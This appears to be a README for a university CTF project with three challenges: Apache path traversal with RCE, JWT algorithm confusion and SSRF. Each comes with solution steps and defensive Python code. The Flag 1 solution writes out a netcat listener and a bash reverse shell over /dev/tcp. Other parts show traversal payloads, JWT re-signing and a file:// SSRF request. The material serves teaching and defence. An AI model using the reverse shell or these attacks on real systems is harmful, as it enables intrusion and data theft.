SecurityCTF

CTF challenges for critical vulnerability exploits

Spring 2025, Heidelberg

Task: Design CTF-challenges for multiple common vulnerabilities in real-world environments.

Project Idea

(1) Login / register system to Secure Dashboard
(2) Personal Secure Dashboard

Architecture Draft

Vulnerabilities

Flag 1: Path Traversal Attack

CVE-2021-41773

Create an account even though registration is disabled.


Recommended Solution

1. Open reverse shell

Listen on port 4444 via netcat: nc -lnvp 4444

2. Execute RCE

/bin/bash -i >& /dev/tcp/<IP of the listener>/4444 0>&1

3. Send request to auth-server

Inspect the registration request in the browser.

Send the modified request from the web-server to hostname "auth-server" on port 5000.

Reach RCE via the CGI scripts that are already enabled on the web-server.
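The defensive counterpart to this flag is a path resolver that cannot be escaped. The following is an added example written for this README, not code from the challenge environment or from Apache: it percent-decodes the request path (bounded, so double-encoded dot segments are normalised too), resolves it below a document root, and refuses anything whose resolved form leaves that root. The document root "/srv/www" and the sample request paths are constructed for illustration.

```python
import os
from typing import Optional
from urllib.parse import unquote


def resolve_under_root(root: str, requested: str) -> Optional[str]:
    """Map a requested URL path onto the filesystem below `root`.

    Returns the absolute filesystem path when the request stays inside `root`,
    or None when it must be refused. Percent-decoding is repeated (bounded) so
    that encoded or double-encoded dot segments are normalised before the
    containment check runs; the check compares resolved paths, so it does not
    depend on spotting ".." textually.
    """
    decoded = requested
    for _ in range(3):  # a few rounds suffice; never loop unboundedly on input
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    if "\x00" in decoded:  # NUL bytes have no legitimate place in a request path
        return None
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, decoded.lstrip("/")))
    # Containment: the candidate is the root itself or lies strictly below it.
    # The separator is appended so that "/srv/www-old" is not accepted as a
    # child of "/srv/www".
    if candidate != root_real and not candidate.startswith(root_real + os.sep):
        return None
    return candidate


def classify_requests(root: str, paths):
    """Return {path: verdict} for a batch of request paths (e.g. from a log)."""
    return {p: ("serve" if resolve_under_root(root, p) else "reject") for p in paths}


if __name__ == "__main__":
    # Constructed sample request paths, not taken from any real log.
    SAMPLES = [
        "/index.html",
        "/static/%2e%2e/index.html",
        "/../../etc/passwd",
        "/.%2e/.%2e/etc/passwd",
        "/%252e%252e/%252e%252e/etc/passwd",
        "/index.html%00.png",
    ]
    for path, verdict in classify_requests("/srv/www", SAMPLES).items():
        print(f"{verdict:7s} {path}")
```

Note that "/static/%2e%2e/index.html" is still served: it normalises to a file inside the root, which is the correct outcome. The rule is containment of the resolved path, not a textual ban on dot segments.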

Flag 2: JWT Algorithm Confusion

CVE-2022-29217

Gain admin privileges via scope elevation.


Recommended Solution

1. Extract JWT from Secure Dashboard

After login, the browser stores the JWT as a cookie; extract it via the dev tools.

2. Retrieve Public Key

The public key is served at /.well-known/jwks.json.

Convert it into OpenSSH format.

3. Modify and Re-sign JWT

Apply the algorithm confusion attack: use the public key as the HMAC key and sign a new JWT with scope=admin.
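The bug behind this flag is a verifier that lets the token's own `alg` header choose the cryptographic primitive. The following is an added example for this README, not code from the challenge's auth-server or from any JWT library: a vulnerable verifier is placed next to a hardened one that takes the algorithm from server configuration and refuses PEM material as an HMAC secret. `PUBLIC_KEY_PEM` is a constructed placeholder (not a real RSA key), `rsa_verify` is an assumed hook standing in for a library's RSA check, and the claims are invented.

```python
import base64
import hashlib
import hmac
import json
from typing import Callable, Optional

# Constructed placeholder standing in for the PEM the server would derive from
# its JWKS; it is not a real RSA key and is never used for RSA operations here.
PUBLIC_KEY_PEM = (b"-----BEGIN PUBLIC KEY-----\n"
                  b"PLACEHOLDER-NOT-A-REAL-KEY\n"
                  b"-----END PUBLIC KEY-----\n")

# Assumed signature of a real RSA verification hook: (key, signing_input, sig).
RsaVerify = Callable[[bytes, bytes, bytes], bool]


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Mint an HS256 token (used here only to build inputs for the verifiers)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def _split(token: str):
    """Return (header, claims, signing_input, signature) or None if malformed."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        claims = json.loads(b64url_decode(body_b64))
        return header, claims, f"{header_b64}.{body_b64}".encode(), b64url_decode(sig_b64)
    except (ValueError, json.JSONDecodeError):
        return None


def _hs256_ok(key: bytes, signing_input: bytes, sig: bytes) -> bool:
    return hmac.compare_digest(hmac.new(key, signing_input, hashlib.sha256).digest(), sig)


def verify_vulnerable(token: str, key: bytes, rsa_verify: RsaVerify) -> Optional[dict]:
    """Picks the primitive from the token's own `alg`: the confusion bug.

    With an RSA public key configured, an HS256 token whose MAC was computed
    over that same PEM passes, because the PEM bytes are fed straight to HMAC.
    """
    parsed = _split(token)
    if parsed is None:
        return None
    header, claims, signing_input, sig = parsed
    if header.get("alg") == "HS256":
        ok = _hs256_ok(key, signing_input, sig)
    elif header.get("alg") == "RS256":
        ok = rsa_verify(key, signing_input, sig)
    else:
        ok = False
    return claims if ok else None


def verify_hardened(token: str, expected_alg: str, key: bytes,
                    rsa_verify: Optional[RsaVerify] = None) -> Optional[dict]:
    """The algorithm comes from server configuration, never from the token."""
    parsed = _split(token)
    if parsed is None:
        return None
    header, claims, signing_input, sig = parsed
    if header.get("alg") != expected_alg:        # also rejects "none" and HS* swaps
        return None
    if expected_alg == "HS256":
        if key.startswith(b"-----BEGIN"):         # PEM material is never an HMAC secret
            return None
        ok = _hs256_ok(key, signing_input, sig)
    elif expected_alg == "RS256":
        if rsa_verify is None:
            return None
        ok = rsa_verify(key, signing_input, sig)  # delegate to the real RSA check
    else:
        return None
    return claims if ok else None
```

In a real service the same policy is expressed by pinning the algorithm list at the library call (for example PyJWT's `algorithms=["RS256"]` argument) and by keeping HMAC secrets and public keys in separate configuration so one can never be handed to the other's primitive.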

Flag 3: Server-Side Request Forgery

CVE-2021-3129

Retrieve flag from internal network.


Recommended Solution

1. Explore Admin Dashboard

Use the admin privilege to access the monitoring API:

- http://monitoring-server:9000/health

- http://monitoring-server:9000/metrics

2. Perform SSRF Attack

Run an internal request via SSRF against file://home/admin/flag.txt

Retrieve the final flag by loading flag.txt from the system.
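The SSRF exists because the dashboard forwards a user-supplied URL unchecked. The following is an added example for this README, not code from the challenge's dashboard: an allowlist check for the outbound fetch that permits only the two monitoring endpoints listed above and refuses other schemes (including file://), literal IP addresses, userinfo tricks and unexpected ports. The allowlist values are assumed from the endpoints in this section; the sample URLs in the demo are constructed.

```python
import ipaddress
from typing import Tuple
from urllib.parse import urlsplit

# Server-side allowlist for the monitoring proxy, the only destination the
# admin dashboard needs. Values assumed from the endpoints listed above.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"monitoring-server"}
ALLOWED_PORTS = {9000}


def check_outbound_url(url: str) -> Tuple[bool, str]:
    """Decide whether the dashboard may fetch `url` on the user's behalf.

    Returns (allowed, reason). Every rule is an allowlist: anything not
    explicitly permitted (file://, gopher://, literal IPs, other hosts or
    ports, credentials embedded in the URL) is refused.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a hostname, not a literal address
    if ip is not None:
        # Literal addresses are refused outright; the flag records whether the
        # address would have pointed at an internal range, for logging.
        return False, f"literal IP {host} not allowed (internal={not ip.is_global})"
    if host.lower() not in ALLOWED_HOSTS:
        return False, f"host {host!r} not on allowlist"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample requests, not taken from any real traffic.
    for candidate in [
        "http://monitoring-server:9000/health",
        "http://monitoring-server:9000/metrics",
        "file://home/admin/flag.txt",
        "http://127.0.0.1:9000/health",
        "http://monitoring-server:9000@169.254.169.254/",
        "https://monitoring-server/health",
    ]:
        allowed, reason = check_outbound_url(candidate)
        print(f"{'ALLOW' if allowed else 'DENY ':5s} {candidate}  ({reason})")
```

Hostname allowlisting alone does not defend against DNS rebinding: resolve the allowed host once, validate the resolved address, and connect to that address (or enforce the restriction with egress network policy on the dashboard's container). The stronger design removes the free-form URL entirely and lets the admin pick from fixed endpoint identifiers that the server maps to URLs itself.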

Highly esteemed friend involved in this project

Associated Resources